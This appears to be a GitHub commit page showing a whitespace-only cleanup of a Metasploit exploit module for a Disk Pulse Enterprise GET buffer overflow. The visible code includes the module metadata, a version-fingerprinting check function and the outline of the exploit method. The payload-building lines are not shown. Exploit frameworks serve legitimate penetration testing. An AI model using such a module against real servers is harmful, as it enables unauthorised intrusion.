Skip to content

Commit b8c40a9

Browse files
committed
Clean up formatting
1 parent 3c204f9 commit b8c40a9

File tree

1 file changed

+11
-11
lines changed

1 file changed

+11
-11
lines changed

modules/exploits/windows/http/disk_pulse_enterprise_get.rb

Lines changed: 11 additions & 11 deletions
Original file line numberDiff line numberDiff line change
@@ -2,15 +2,15 @@
22
# This module requires Metasploit: http://metasploit.com/download
33
# Current source: https://github.com/rapid7/metasploit-framework
44
##
5-
5+
66
require 'msf/core'
7-
7+
88
class MetasploitModule < Msf::Exploit::Remote
99
Rank = ExcellentRanking
10-
10+
1111
include Msf::Exploit::Remote::HttpClient
1212
include Msf::Exploit::Remote::Seh
13-
13+
1414
def initialize(info = {})
1515
super(update_info(info,
1616
'Name' => 'Disk Pulse Enterprise GET Buffer Overflow',
@@ -52,24 +52,24 @@ def initialize(info = {})
5252
'Privileged' => true,
5353
'DisclosureDate' => 'Aug 25 2017',
5454
'DefaultTarget' => 0))
55-
55+
5656
register_options([Opt::RPORT(80)], self.class)
57-
57+
5858
end
59-
59+
6060
def check
6161
res = send_request_cgi({
6262
'uri' => '/',
6363
'method' => 'GET'
6464
})
65-
65+
6666
if res and res.code == 200 and res.body =~ /Disk Pulse Enterprise v9\.9\.16/
6767
return Exploit::CheckCode::Appears
6868
end
69-
69+
7070
return Exploit::CheckCode::Safe
7171
end
72-
72+
7373
def exploit
7474
connect
7575

@@ -94,4 +94,4 @@ def exploit
9494
disconnect
9595

9696
end
97-
end
97+
end

0 commit comments

Comments
 (0)